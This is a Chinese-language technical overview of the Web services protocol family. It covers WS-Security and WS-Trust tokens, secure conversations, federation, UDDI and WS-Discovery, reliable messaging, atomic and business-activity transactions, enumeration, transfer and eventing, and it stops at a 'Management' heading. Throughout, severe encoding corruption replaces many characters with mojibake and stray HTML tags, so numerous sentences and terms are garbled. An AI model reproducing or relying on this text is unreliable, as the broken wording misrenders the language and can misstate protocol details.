    在决定要对哪些元素进行加密以及要使用哪些加密��法�Ӟ��Web服务设计人员一定要清楚消息是如何处理的。当某些特定的Header元素需要由�W�三�Ҏ��中介来处理时�Q�这些决定就更�ؓ重要了。如果这些参与者对适当的解密数据或对在加密XML元素时所使用的约定毫无所知，它们��无法实现正��操作。此外，每个处理节点�Ҏ��息中包含的安全信息都必须有个一般的了解。加密某一Header中XML元素的一个自焉��择��是对它�q�行完全加密�Q�用初始元素替代加密数据�c�d��的元素。这�U�简单的�Ҏ��有些�~�点。例如，中介不太好确定必��d��理哪些元素（带有mustUnderstand="1"属性的元素�Q�。另外，当元素类型发生变化时�Q�确定其初始�c�d��比较困难。另一�U�方法是对元素进行�{换，使得�q�行正确的SOAP处理所需的所有关键属性都保持不变�Q�且对初始元素进行了加密�Q��ƈ攑֜�一个特�D�的子元素中。这�U�方法的优点是即使不知道如何解密元素的中介也能实现正��的处理。这�U�方法的一个缺�Ҏ��它要求所有参与者都了解用于表示初始元素的约定。尽��WS-Security目前没有对这�U�方法提供指��|��但我们预期将来会提供的。相比之下这�U�方法更好一些，因�ؓ它可实现所有SOAP Header元素的正��处理�?/P>
    WS-Security的概要规范中描述了几�U�安全性��o牌。针对表�C�用户名的��o牌、X.509证书和基于XML的安全性��o牌的概要都已�l�开发出来。基于XML的安全性��o牌包括安全性断�a�标记语言�Q�SAML�Q�Security Assertion Markup Language�Q�和可扩展权限标记语�a�/权限表达语言�Q�REL�Q�Rights Expression Language�Q�。Kerberos��的使用规范�q�未成型�?/P>
WS-I基本安全概要
    WS-I��要发布的最新的互操作性概要之一是基本安全概要（BSP�Q�Basic Security Profile�Q�。该概要提供了WS-Security和各�U�安全性��o牌，如Username和X.509证书令牌的实现指对{��该概要用于补充和完善WS-I基本概要�?/P>
��Z��安全令牌的信�?/H2>
    安全性��o牌是提供端到端安全解��x��案所必需的。这些安全性��o牌必��d��消息处理的参与者之间实现直接或间接�׃�n。各参与者还必须��定断言的凭证是否可信。这些信��d��p�M��安全性��o牌的交换和代理�ؓ基础�Q��ƈ存在于已�l�确定的支持信�Q�{�略中。例如，某一代理的��o牌有多少可信�Q�是��q��l�管理员和他们确定的信�Q关系军_��的。提供安全性��o牌的服务五花八门。这是各�U�底层安全技术首先�ؓWeb服务所使用的领域。�ؓ了提供一�U�与安全技术无关的�l�一标准的解��x��案，新协议是��Z��d��之间的安全性��o牌交换而设计的�?/P>
    WS-Trust以用于请求、发出和代理安全性��o牌的协议对WS-Security�q�行了补充。需要特别指出的是，其中定义了用于获取、发行、更新和验证安全性��o牌的操作。该规范的另一个新�Ҏ��是建立��C��d��pȝ��机制。IPsec或TLS/SSL之类的网�l�和传输保护机制可以与WS-Trust�l�合�Q�以适应不同的安全性需求和情况�?/P>
    安全性��o牌可以直接从某一适当的发行者处甌��获得�Q�或者通过委托某一受信�ȝ��W�三�Ҏ��获取。��o牌还可以��Z��意料地获得。例如，令牌可以从某一安全权威机构发送到一个�ƈ未明��申误��令牌的某一斏V��ؓ此，�pȝ��理员要��定初始信�Q关系�Q�如��某一�l�定服务指定��Z��ȝ��Ҏ��务。这�U�方法类��g��目前Web上用于自展安全性的�Ҏ��。从该服务获得的所有��o牌受信�Q的程度与受信�ȝ��Ҏ��务本�w�相同。例如，如果某根服务只有断言A和B得到信�Q�Q�且某一消息包含断言A、B和C�Q�则该消息中只有断言A和B得到信�Q。配�|�灵�z�L��是通过信�Q关系授权提供的。�ؓ了处理在退回或发出安全性��o牌之前需要各方之间的一个交换集的情况，定义了用于验证、协商和交换的方法。一�U�称为“challenge”的�Ҏ��形式的交换�ؓ某一方证明它拥有与某一令牌兌��的密钥提供了一�U�方法。交换的其他�c�d��包括传统的协议隧道。WS-Trust详细说明了如何扩展该规范�Q�以支持更多的��o牌交换协议，而不仅仅是所�l�出的这两个例子�?/P>
    表示安全性断�a�的安全性��o牌是�׃��个受信�Q�Ҏ��一个通过一个授权链的根发行的。这些安全性断�a�用于验证消息�W�合正在施行的安全策略。它们还验证断言者的属性是通过�{�֐�来校验的。在代理的信��L��式中�Q�即由受信�Q的中介分配安全性��o牌的模式中，�{�֐�可能不验证断�a�者的�w�䆾�Q�而验证中介的�w�䆾。该中介可能只断�a�者的�w�䆾�?/P>
安全会话

    用于消息�w�䆾验证和机密性的某些机制可能会耗用大量的资源。需要特别指出的是，许多加密技术都会显著消耗处理能力。当消息的安全性是逐一得到保证�Ӟ��q�些代�h通常是无法避免的。不�q�，当两个Web服务�q�行许多消息的交换时�Q�可以��用比WS-Security中定义的�Ҏ��更�ؓ高效和健壮的消息机密性方法。这些方法是��Z��对称加密的，在保证消息会话的安全时应使用它们�?/P>
    WS-SecureConversation在基于共享密钥（如对�U�加密）的两个通信方之间定义了一个安全上下文。在整个会话期内�Q�安全上下文在各通信方之间始�l�是�׃�n的。会话密钥由�׃�n密钥�z��而来�Q�用于解密在会话中发送的单个消息。安全上下文在线表示��Z��个新的安全性��o牌类型（即SCT �Q�Security Context Token�Q��?/P>
    规范为徏立安全会话各方之间的安全上下文定义了3�U�不同方法。第一�U�，由安全性��o牌服务创建，且必��ȝ��会话发�v�Ҏ��取�ƈ传送。第二种�Q�通信一方创建安全上下文�q��过消息传递给另一斏V��第三种�Q�通过协商和交换创建安全上下文。Web服务会选择最能满��_��需要的�Ҏ��。必要时可以对安全上下文�q�行修正。更新安全上下文的一个典型例子是廉��安全上下文的截止旉��。安全上下文令牌隐含或包含了一个共享密钥。该密钥用于�{�֐�、加密消息。当使用�׃�n密钥�Ӟ��通信各方可以选用不同的密钥派生模式。例如，可以�z��?个密钥，�q�样双方便可以��用单独的密钥来签名和加密消息。�ؓ了保证密钥未曄��q�和保持高度的安全性，应��用后�l�的�z��密钥。��用这�U�方法来保证会话的安全性是一�U�更好的选择。WS-SecureConversation规范定义了一�U�方法来指示�l�定消息正在使用哪些�z��密钥。所有派生算法都是通过URI来识别的�?/P>
安全�{�略

    WS-SecurityPolicy通过用一�U�符合WS-Policy的语�a�指定安全�{�略断言来完善WS-Security�Q�其6�U�断�a�涉及安全性��o牌、消息完整性、消息机密性、消息对SOAP中介的可见性、对安全Header的约束和消息寿命。例如，某一�{�略断言可能要求所有消息都使用某一权威机构提供的公钥来�{�֐��Q�或该��n份验证要��Z��Kerberos��?/P>
�pȝ��联盟

    除了我们已经介绍的方法以外，应用�E�序安全性还需要更多的�Ҏ��。例如，在某一信�Q域中有效的��n份在其他信�Q域中很可能没有意义。要让不同信��d��中的服务能够验证�w�䆾的有效性，��需要适当的机制。WS-Federation定义了一些机�Ӟ��以支持��n份、帐戗��属性、��n份验证和�w�䆾验证信息跨信��d��的共享。利用这些机�Ӟ��多个安全域可以通过在由多方参与的Web服务之间支持和代理��n份、属性和�w�䆾验证的信任而结成联盟。该规范扩展了WS-Trust模型�Q��属性和�W�名可以被整合到令牌发行机制中，从而�Ş成一�U�多域��n份映��机制。这些机刉��支持单点��d��、退出和�W�名�Q��ƈ描述了专业服务对于属性和�W�名的作用�?/P>
    通过�w�䆾联盟�Q�很多要求都可以得到满��。就拿将一名员工与光��d��联�v来的例子来说�Q�公司A的Jane从OfficeSupplyStore.com�q�行采购�Q�公司A和OfficeSupplyStore.com之间有一个采购合同。因为Jane的��n份是与公司A兌��的，所以可以让�Ҏ��依据该合同来�q�行采购。第二个例子是将一个�h映射到多个笔名。大家可能只知道Joe使用joe@companya.com工作。他�q�可能有其他�w�䆾�Q�如joe_bloggs@hotmail.com和josephb@cornell.edu。通过�w�䆾联盟�Q�系�l�可以确定这些��n份都是同一个Joe�?/P>
    Web服务联合安全架构中定义了两个一般的��h��者（消息发送者）�c�：被动和智能（�z�d��Q�。被动请求者是只��用HTTP且从来不发出安全性��o牌的服务。智能请求者是能够发出包含诸如WS-Security和WS-Trust中所描述的那些安全性��o牌的消息的服务。传�l�的��Z��HTTP的Web��览器就是被动请求者的一个例子。定义这两种��h��者的行�ؓ的概要规范现已开发出来。对于智能请求者，active��h��者概要详�l�说明了单点��d��、退出和�W�名是如何通过使用SOAP消息而整合到Web服务安全模型中的。实际上�Q�该概要描述了在��h��者上下文中实现WS-联盟中所描述的模式的�Ҏ��。它详细说明了各�U�安全性��o牌的要求。作��些安全性��o牌要求中之一的一个例子，当不使用安全通道�Ӟ��X.509证书的整个��o牌必��d��含权威机构的名称和签名。该概要�q�要求X.509令牌包含主题标识�W�，以唯一地识别授之以该��o牌的主题�?/P>
发现�Q�Discovery�Q?/H1>
    本节介绍Web服务架构中用于定位网�l�上Web服务和确定该服务可用性的功能�l��g�Q�UDDI和WS-Discovery。Web服务发现是在没有人工�q�预的情况下实现服务�q�接自动化的关键。Web服务发现�Ҏ��反映了计��机�pȝ��中查找信息的两个最常见�Ҏ��Q�查看一个众所周知的目录，或将一个请求广播给所有可用的监听器。UDDI注册表就相当于该目录�Q�发现协议用于广播请求�?/P>
目录�Q�Directory�Q?/H2>
    通用描述发现和集成协议，即UDDI——Universal Description Discovery and Integration Protocol�Q�指定了一个用于查询和更新Web服务信息通用目录协议。该目录包含关于服务提供商、它们所托管的服务以及这些服务所实施的协议的信息。该目录�q�提供了用于向�Q何注册信息添加元数据的方法。如果Web服务信息存储在众所周知的位�|�时�Q�则可以使用UDDI目录�Ҏ��。一旦找到目录，��可以发送一�p�d��查询��h��以获取想要的信息。UDDI目录位置通常是通过�pȝ��配置数据从带外（Out of Band�Q�获得的�?/P>
    对于如何部��vUDDI注册表，Web服务提供商有很多不同的选择。部�|�方案不外乎3个类别：公共、企业外和企业内。�ؓ了支持公共部�|Ԍ��以Microsoft、IBM和SAP为首的一�l�供应商��L��推出了UDDI企业注册表[UBR�Q�UDDI Business Registry]。UBR是一个可跨多个主持企业复制的公共UDDI注册表，它既是基于Internet的Web服务资源�Q�又是Web服务开发者的一个试验台。尽��目前公共UDDI实施已经受到了最大关注，但UDDI的早期采用者仍更們֐�于��用企业外和企业内�Ҏ��。在�q�两�U�部�|�情况下�Q�企业要部��v一个专用注册表�Q�而且更严密地控制注册信息�c�d��也是可能的。这些专用注册表可能只供一个企业��用，也可能供若干�l�业务合作伙伴��用。UDDI�q��ؓ注册表间的复制和跨部�|�的信�Q联盟定义了协议。��用这些协议进一步增加了可用于实施者的部��v�Ҏ��数量。对于所有的部��v�Ҏ��Q�UDDI目录都包含了Web服务及其托管地的详细信息。UDDI目录��Ҏ��3个主要部分——服务提供商、所提供的Web服务和实施绑定。其中的每一部分都逐渐提供有关Web服务的更详细信息�?/P>
    大部分的一般信息都描述服务提供商。该信息不针对Web服务软�g�Q�而是针对直接负责该服务的开发者或实施者。服务提供商信息包括名称、地址、联�p�M�h及其他管理细节。所有的UDDI��w��有多个元素来支持多语�a�描述。可用的Web服务列表存储在服务提供商��中。这些服务可能是�Ҏ��它们的预定用途来�l�织的：它们可能被分成不同的应用领域、地区或��M��其他适用的模式。存储在UDDI注册表中的服务信息只包含服务描述和一个指向它所包含的Web服务实施的指针。由其他提供商托��的服务链接�U�Cؓ‘服务映��（Service Projection�Q�’，也可能被注册�?/P>
    UDDI服务提供商实体的最后部分是实施�l�定。该�l�定��Web服务��与��切的URI兌��h��Q�以��定在何处部�|�服务，它还指定了访问协议，�q�包含所实施的确切协议的参考资料。这些细节对于开发�h员编写调用Web服务的应用程序已�l��够。详�l�的协议定义的是通过一个称为“类型模型（即tModel�Q�Type Model�Q�”的UDDI 实体提供的。在许多情况下，tModel都会引用一个描�q�SOAP Web服务接口的WSDL文�g描述�Q�但tModel的灵�z�L��也几乎可以描述��M��U�类的资源。对于在UDDI中注册的每一个提供商或服务来��_��来自标准分类学（如NAICS和较古老的��国标准行业代码�Q�或其他�w�䆾识别�Ҏ��Q�如Edgar Central Index Key�Q�的元数据都可用于分�c�M��息和提高搜烦准确性。可用的分类学和标识�W�方案集作�ؓ��M��实施的一部分�Q�是可轻松扩展的�Q�因此可以对其进行定制以支持��M��特定的地域、行业或企业需求�?/P>
动态发玎ͼ�Dynamic Discovery�Q?/H2>
    动态Web服务发现是以不同方式提供的。作为在已知注册表中存储信息的另一�U�方案，动态发现的Web服务会明��地声明它们的到达、离开�|�络。WS-Discovery为通过多�\�q�播消息来声明和发现Web服务定义了协议。当Web服务�q�接到网�l�时�Q�它通过发送一条Hello消息来声明它的到达。在最��单的情况下，�q�些声明的跨�|�发送��用多路广播协议——我们称之�ؓ自组�l�网�l�。该�Ҏ��q�最大限度地减少了网�l�上的轮询需要。�ؓ了限制网�l�信息流通量和优化发现过�E�，�pȝ��可能会包含一个发��C��理。发��C��理用一个众所周知的服务位�|�取代了发送多路广播消息的需要，从而将自组�l�网�l��{变成托管�|�络。利用配�|�信息，代理服务集合可以�q�接在一��P��从而将发现服务扩展到多�l�服务器�Q�从一台机器扩展到多台机器�?/P>
    因�ؓ发现代理自��n也是Web服务�Q�它们可能会用自�׃��用的Hello消息来声明它们的到场。接收该消息的Web服务然后可以利用该代理的服务�Q�而无需再��用干扰较多的一对多发现协议。当服务��d��|�络�Ӟ��WS-Discovery会指定一个Bye消息以发送给�|�络或发��C��理。该消息通知�|�络上的其他服务��d��的Web服务不再可用�?/P>
    ��Z��完善�q�种服务声明和离开的基本方法的不��Q�WS-Discovery定义了两个操作——Probe和Resolve�Q�以定位�|�络上的Web服务。对于自�l�织�|�络�Q�Probe消息被发送给多�\�q�播�l�，�q�且与该��h��匚w��的目标服务会��响应直接反馈给��h��者。对于利用发��C��理的托管�|�络�Q�Probe消息则以单�\�q�播方式发送给发现代理。如果按名称定位Web服务�Q�则使用Resolve消息。Resolve消息只以多�\�q�播模式发送。Resolve �c�M��于地址解析协议�Q�即ARP�Q�它��IP地址转换成其对应的物理网�l�地址。WS-Discovery规范�q�支持这��L��pȝ��配置�Q�将Probe消息发送给一个已�l�通过其他��理�Ҏ��建立��h��的发��C��理，如通过使用众所周知的DHCP记录�?/P>
    动态发现服务的能力实现了Web服务��理的自举。与WS-Eventing及其他协议相�l�合�Q�更复杂的管理服务也可以通过使用�q�种动态发现基��架构来构建。动态发现还��Web服务架构扩展到设备，如那些目前可能实施通用��x��即用�Q�UPnP�Q�协议的�pȝ��——这是��该架构真正实现通用的重要一步。例如，借助WS-Discovery和WS-Eventing�Q�打印机或存储介质等讑֤�可以作�ؓWeb服务�U�_��到系�l�中�Q�而且无需专门的工��h��协议�?/P>
Web服务讑֤�概要规范
    Web服务讑֤�概要规范对在资源受限的设备上应该实施Web服务架构规范家族的哪个子集提供了指导。该概要力图在由于资源限制而作出折��h��Q�在可用的丰富功能和最重要的功能之间找到��^衡�?/P>
一致性协议——可靠的消息传递和事务

    本节介绍可以提供可靠的消息传送、事务行为和能够在一�l�Web服务之间�q�行昑ּ�协调的Web服务架构�l��g。定义这些功能的规范是WS-ReliableMessaging、WS-Coordination、WS-AtomicTransaction和WS-BusinessActivity�?/P>
    当多个Web服务必须完成工作的某一共同单元或依照某�U�共同的行�ؓ�q�行操作�Ӟ��对于使用哪个协议必须达成��p��。Web服务之间�q�种最低限度的协调是不可避免的。协调协议还必须能够��定�q�同意已达成一个共同目标。Web服务之间的每一个交互都可以看作一�U�协调。一致性协议�ؓ该架构提供了一个改�q�的��Z��Q�即参与者服务在它们准备共同完成的�Q务方面将获得成功。在传输丢失了消息和服务失常�Ӟ��Web服务架构仍然能够正常工作�?/P>
    ��M��多方协调都可以通过接连地随需加入更多参与者从两方协调逐步发展而成。两方协调可能是自发的，也可能需要一个指定的协调者。广泛��用的自发协调协议的一个例子是同步��h��—响应消息传递模式。这是一致性协调的最��单�Ş式之一�Q�对于每个工作请求，接收方Web服务必须完成所有预期工作之后才能向��h��者返回数据。双斚w��遵��@�q�种严格的模式，无需昑ּ�协调服务�?/P>
可靠的消息传�?/H2>
    很多情�Ş都可能中断两个服务之间的消息交换。当使用不可靠的传输协议�Q�如HTTP 1.0和SMTP�Q�来�q�行传输或当消息交换跨多个传输层�q�接�Ӟ��q�更会成��Z��个问题。消息可能会丢失、被复制或重新排序，Web服务可能会失败�ƈ失去易变状态。WS-ReliableMessaging是一个基于特定的传送保证特征实现可靠消息传送的协议。该规范定义�?个可�l�合使用的不同断�a��Q?/P>

At-Least-Once Delivery�Q�至��一�ơ传送）�Q�每条消息至��传送一�ơ�?
At-Most-Once Delivery�Q�至多一�ơ传送）�Q�不传送重复的消息�?
In-Order Delivery�Q�依�ơ传送）�Q�按消息的发送顺序传送消息�?

    臛_��一�ơ和臛_��一�ơ保证相�l�合的结果是恰好�q�行一�ơ传送。由于Web服务架构的设计与传输无关�Q�因此所有传送都与所用的通信传输工具或其�l�合无关。由于开发�h员必��预��的潜在传送失败模式数量减��，故��用WS-ReliableMessaging可以��化系�l�开发�?/P>
    可靠的消息传送不需要显式协调者。当使用WS-ReliableMessaging�Ӟ��参与者必��L��据SOAP消息Header中所发送的信息识别协议。作��Z��个组传输的消息集合称为消息序列（Message Sequence�Q�。消息序列可以由发�v�?发送者或Web服务创徏�Q�当建立一�U�双向关联时通常由它们共同创建。序列是使用CreateSequence和CreateSequenceResponse消息昑ּ�创徏的。当惌��的最�l�结果是用两个单向序列来充当一个双向序列时�Q�发赯��将提供Web服务所要��用的序列。该序列的ID由发赯��包含在CreateSequence消息中�?/P>
    WS-ReliableMessaging中定义了几个�{�略断言。这些策略断�a�用WS-Policy中定义的�Ҏ��来表�C��?/P>
    可靠的消息传递协议简化了开发�h员�ؓ在传输不断变化的情况下传输消息而必��ȝ��写的代码。也��是��_��底层基础架构可以�Ҏ��息在端点之间的正�怼�输进行验证，必要时还会�{发消息�ƈ��重复。应用程序不需要�Q何附加逻辑来处理提供传送可能需要的消息转发、重复消息的消除、消息重新排序或消息��认。WS-ReliableMessaging的实施是跨发赯��和服务分布的。那些非‘在�U�쀙可见的特征�Q�如消息传送顺序，是通过实施WS-ReliableMessaging规范来提供的。虽然由传输损失��D��的消息重发等特征是通过不�ؓ应用�E�序所知的消息传递层来处理的�Q�其他端到端特征�Q�如依次传送）都要求消息传递基��架构和接收应用程序相互协作。当发送者希望按发送顺序提供消息排序时�Q�在接收者一方却按接攉��序提供消息排序的情况是依�ơ传送的一�U�不正确实施——注意到�q�一�Ҏ��很有��的。当发送者希望按接收��序提供消息��序�Ӟ��在接收者一�Ҏ��发送顺序提供消息顺序的情况�Q�是依次传送的一�U�正��实施�?/P>
指定的协调�?/H2>
    N路协调协议的某些族需要一个指定的协调者来引导一个工作单元通过一�p�d��合作服务�Q�一个例子是�z�d��必须在不希望被同时连接的服务之间协调。只要每个参与者和协调者在某一时刻通信�Q�协调就可能发生�Q�结果就可能达成一致。Web服务架构为指定的协调者定义了某些��单操作�?/P>
    WS-Coordination规范定义了一个可扩展的协调框架来支持需要显式协调者的情况。该协议引入了一个称为协调上下文�Q�Coordination Context�Q�的SOAP头块�Q�用以唯一地识别联合工作中��要着手进行的部分。�ؓ了启动工作的接合部分�Q�Web服务会向一个或多个目标服务发送协调上下文。收到协调上下文后，接收�Ҏ��务会得到提示�Q�说有联合协作请求提出。协调上下文中包含了��_��的信息，��h��接收者可以利用这些信息来��定是否参与该工作。协调上下文中包含的��切信息�Ҏ��被请求工作的�U�类的不同而变化�?/P>
    协调�c�d��集是可扩充的。只要参与该联合工作的每个服务对所需行�ؓ都有个一般的了解�Q�新�c�d��可以通过实施来定义。例如，原子事务是Web服务架构中已�l�定义了的几个初始基��协调�c�d��之一。如果被��h��的协调类型被理解�q�被接受�Q�Web服务��׃��使用WS-Coordination注册协议来通知协调者�ƈ参与该联合工作。协调上下文中包含了协调者的一个端点引用和可能行�ؓ的可选标识符。注册操作指定该多方参与的Web服务所支持的行为。一旦注册消息发送到协调者，Web服务��׃��依照它们所预订的协议参与该工作。注册是协调框架中的关键操作�Q�它允许意欲协同配合以完成工作的共同单元的不同Web服务�怺��q�接在一赗��?/P>
    WS-AtomicTransaction为Web服务指定了传�l�的ACID事务�Q��ƈ为原子事务协调类型定义了3个协议：完成协议�Q�Completion Protocol�Q�和两阶�D�|��交协议（Two-Phase Commit Protocol�Q�的两个变体。完成协议用于启动提交处理。�ؓ完成而注册的Web服务能够通知指定的协调者何时开始提交处理。该协议�q�详�l�说明了用于通知启动者事务最�l�结果的消息。不�q�，该协议不要求协调者确保启动者对�l�果�q�行处理。相反，WS-AtomicTransaction中的其他行�ؓ则要求协调者确保参与者对协调消息�q�行处理�?/P>
    两阶�D�|��交（2PC�Q�协议�ؓ所有已注册的参与者提供了一个公��q��提交或中止决定，��保了所有参与者都能得到最�l�结果通知。顾名思义�Q�它使用两轮通知来完成该事务。该协议的两个变体是�Q�易�?PC�Q�Volatile 2PC�Q�和持久2PC�Q�Durable 2PC�Q�。这两个协议在线上��用相同的消息�Q�对应于Prepare、Commit和Abort操作�Q�，但易�?PC没有持久性要求。易�?PC协议供管理易��p��源的参与者��用，如缓存管理器或窗口管理器。这些参与者在�W�一轮通知中不与协调者发生联�p�，且不需要第二轮的通知。持�?PC协议供管理数据库和文件等持久资源的参与者��用。当某一提交处理已经启动�Ӟ��在所有易�?PC参与者被联系�q�之后这些参与者会�W�一�ơ被联系。这使缓存能够被��h��。持�?PC参与者需要完整的两轮通知来实现协调者所要求的全有或全无行�ؓ以及完成该事务。这些行为最适合于可以在整个事务期内持有资源�Q�且该事务通常为非常短暂的事务的情��c��该协议保证在正常处理的情况下，协调者提供第一阶段�l�果的同时将联系所有参与者。对于完成时间预计将比较长的事务�Q�或当资源（如锁�Q�无法持有时�Q�其他协调协议就会定义替换行为�?/P>
    WS-AtomicTransaction中定义了若干�{�略断言�Q�这些策略断�a�使用WS-Policy中定义的�Ҏ��来表�C��?/P>
排队�pȝ��Q�Queued System�Q?/H2>
    构徏分布式系�l�时被证明非常有用的一�U�模式是使用事务持久队列来提供存储�{发异步消息传送。在�q�种模式下，原子事务被用于每一个传输端炏V��在发送端�Q�发送应用程序以原子事务方式��消息发送给一个持久队列，此时应用�E�序和队列管理器都��用WS-AtomicTransaction来进行协调。只有在处理消息时不发生错误�Q�消息才被认为成功发送至该队列。接下来�Q�发送队列和接收队列之间消息的传送由队列子系�l�来接管。该传输步骤可以在消息置入发送队列之后的某一时刻完成。此外，发送队列的位置无需与发出消息的应用�E�序的位�|�一致。与此类��|��从接攉��列检索消息的应用�E�序也��用原子事务来执行�c�M��操作。也��是��_��只有不出现处理错误时消息才能从队列中�U�除�?/P>
持箋旉��长的�z�d��Q�Long Duration Activities�Q?/H2>
    WS-BusinessActivity��行时间长的事务指定了两个协议。WS-BusinessActivity规范在事务提交之前�ƈ不锁定资源，而是��Z��补偿操作。底层事务模型是所谓的开攑ֵ�套事务。这些协议系�l�化地说明了松耦合服务如何对已�l�完成某一联合��d��达成一致意见。在其中的一个协议中�Q�协调者显式地通知参与者没有更多的工作正在以联合�Q务的名义被请求。在另一个协议中�Q�该参与者就是通知协调者以联合��d��名义出现的工作已�l�完成的参与者。��用补偿操作可以在不锁定这些操作的情况下完成试验性操作。不��出于何故，只要�pȝ��惌��撤消已完成的试验性操作结果，��p��启动补偿操作。WS-AtomicTransaction和WS-BusinessActivity都利用WS-Coordination来管理Web服务之间的协作�?/P>
三方握手
    三方握手�q�接的徏立和解除协议是不需要指定协调者服务的协调协议的一个例子。�ؓ了徏立连接，发送者要向接收者发送一个请求。该��h��建立一个会话。如果该��h��被接受，接收者就会发��Z��条确认消息，对该��h��作出�U�极响应。发送者然后再发送一条消息，作�ؓ对该��认消息的确认，从而证明双斚w��知道�Ҏ��已经建立了一个会话�?/P>
    解除协议�c�M��。一方向另一方发送一个会话解除请求。接收者以对解除消息的��认消息作�ؓ响应。接收到该确认消息之后，发出解除消息的一斚w��过再对该确认消息发送一条确认消息结束消息交换�?/P>
枚�D、传输和事�g

    本节介绍提供Web服务架构中的服务资源枚�D、其状态管理和事�g通知的规范。这些规范基于WS-Enumeration、WS-Transfer和WS-Eventing�?/P>
枚�D�Q�Enumeration�Q?/H2>
    很多情况所要求的数据交换都使用不只一对的��h��/响应消息。需要这些更长时间数据交换的应用�c�d��包括数据库查询、数据流、命名空间等信息的遍历和枚�D列表。特别是枚�D�Q�它是通过建立数据源和��h��者之间的会话来实现的。会话中接连不断的消息用于传送正在被��索的元素的集合。对于该服务用于�l�织��要生成的项的方法不作假设。在正常处理的情况下�Q�枚丑ֺ�在会话结束前生成所有底层数据�?/P>
    WS-Enumeration指定了用于徏立枚举会话和��索数据序列的协议。枚丑֍�议允许数据源向正在��用的服务提供一个叫做枚举上下文的会话抽象。该上下文通过一个数据项序列来表�C�逻辑光标。然后，��h��者将该枚举上下文用于一个或多个SOAP消息的某一区间以请求数据。枚举数据表�C�ZؓXML Infoset。该规范�q�允许数据源提供一�U�自定义机制来开始新的枚举。既然枚举会话可能需要若�q�个消息交换�Q�那么会话状态必��M��持稳定�?/P>
    关于�q�代�q�度的状态信息可以由数据源或正在使用的服务在��h��间维护。WS-Enumeration允许数据源一个请求一个请求地军_��哪一方将负责�l�护下一个请求的状态。这�U�灵�z�L��实��C��若干�U�优化。例如，使服务器能够避免对调用之间的��M��光标状态进行保存。由于消息潜伏时间对于支持若�q�个同时枚�D的服务来说可能会很长�Q�不保存状态可能会使必��ȝ��护的信息总量大大减少。资源受限设备（如移动电话）上的服务实现可能�Ҏ��无法�l�护��M��状态信息�?/P>
传输�Q�Transfer�Q?/H2>
    WS-Transfer详细说明了对通过Web服务�q�行讉K��的数据实体进行管理所需的基本操作。要了解WS-Transfer需要介�l�两个新术语�Q�工厂（Factory�Q�和资源�Q�Resource�Q�。工厂是能够从其XML表示形式创徏资源的Web服务。WS-Transfer引入了用于创建、更新、检索和删除资源的操作。应当注意，对于资源状态维护，宿主服务器最多也只能做到��力而�ؓ。当客户端获知服务器接受了创建或更新某一资源的请求时�Q�它可以适当地预期资源目前在的确定位�|�，�q�具有确定了的表�C��Ş式，但这�q�不是一个保证——即使是在没有�Q何第三方的情况下。服务器可能会更�Ҏ��一资源的表�C��Ş式，可能会彻底删除某一资源�Q�也可能会恢复已�l�删除的某一资源。这�U�保证的�~�Z��与Web提供的松耦合模型一致。如果需要，服务可以提供非Web服务架构所必需的附加保证�?/P>
    WS-Transfer的创建、更新和删除操作扩展了WS-MetadataExchange中的只读操作功能。检索操作与WS-MetadataExchange中的Get操作完全相同。Create��h��发送给工厂。然后，工厂创徏被请求的资源�q�确定其初始表示形式。工厂被假定与所创徏的资源不同。新资源被分配给一个在响应消息中返回的�Q�由服务军_��的端点引用。Put操作通过提供一�U�替换表�C��Ş式来更新资源。资源表�C��Ş式的一�ơ性快照与WS-MetadataExchange中的Get操作一��P��也可以通过WS-Transfer中的Get操作来检索。Delete操作成功后，资源��无法再通过端点引用来��用。这4个元数据��理操作构成了Web服务中状态管理的构徏基础�?/P>
事�g�Q�Eventing�Q?/H2>
    在由需要相互通信的服务构成的�pȝ��中，可能会��用异步消息传递。在很多情况下，�׃��个服务生成的信息也是其他服务所需要的。由于�׾~�性差�Q�轮询往往不是获得�q�种信息的有效方法；通过�|�络发送的不必要的消息太多了。相反，该架构需要一�U�当事�g发生时发出显式通知的机制。更重要的要求是源服务和用户服务的绑定必��d��q�行时动态完成。�ؓ此，Web服务架构提供了一个轻量��事�g协议�?/P>
    WS-Eventing详细说明了实��C��?个实体交互的机制�Q�订戗��订阅管理器、事件源和事件接收。这使某一Web服务在作��Z��个订��h��能够登记它对另一个Web服务�Q�事件源�Q�所提供的特定事件的兴趣。这�U�注册叫做订阅。WS-Eventing定义了某一服务可以提供的支持订阅创建和��理的操作。当事�g源判定有事�g发生�Ӟ��它就会将此信息提供给订阅��理器。订阅管理器然后可以��该事�g传送给所有匹配的订阅�Q�这�c�M��于传�l�的发布/订阅事�g通知�pȝ��中的发布主题。Web服务架构提供了主题定义、组�l�和发现方式的全面灵�z�L��；它�ؓ在很多不同的应用场合中可能会用到的订阅提供了一个通用的管理基��架构。也可以订阅出租的资源，但最�l�都必须收回。用于收回资源的主要机制是各个订阅的到期旉��。查询订阅状态同样也有一�U�机�Ӟ��帮助订户��理其若�q�订阅事��（包括�l�订、通知和取消订阅的��h��Q�的附加操作规范中也有详�l�说明。当�Ӟ��M��服务都可以随时自由地�l�止订阅�Q�这与所有Web服务的自��d��则一致。订阅终止消息可供事件源通知订户订阅�l�止�q�早�?/P>
    虽然��Z��事�g的异步消息的一般模式很常见�Q�但不同的应用通常都要求��用不同的事�g传送机制。例如，在某些情况下��单异步消息可能是最佳选择�Q�但如果事�g接收能够通过轮询控制消息��和消息到达旉��Q�则其他情况可能会更适用。当接收无法从源头到辄��的地�Ӟ��如接收有防火墙阻拦的情况下，轮询也是必要的。WS-Eventing中所引入的传送模式概念就是用来支持这些要求的。传送模式被用作一个扩展点�Q�以便�ؓ订户、事件接收和事�g源徏立定制的传送机制提供一�U�手�D�c��下�q�管理规范利用了�q�种机制�?/P>
    事�g代理可用于聚合或重新分配来自不同来源的通知�Q�代理还可以用作独立的订阅管理器。这两个�Ҏ��都得��C��WS-Eventing的支持。代理在�pȝ��中可以扮演若�q�个重要角色。主题可以按特定的应用类来组�l��用。代理可以充当通知聚集器，用于整合来自多个来源的事件信息。它们也可以充当�q��o器，�q�比用于其自己通知的过滤器所接收的消息要多。这�U�灵�z�L��是部��v健壮而可伸羃的通知�pȝ��所必需的�?/P>
��理�Q�Management�Q?/H2>
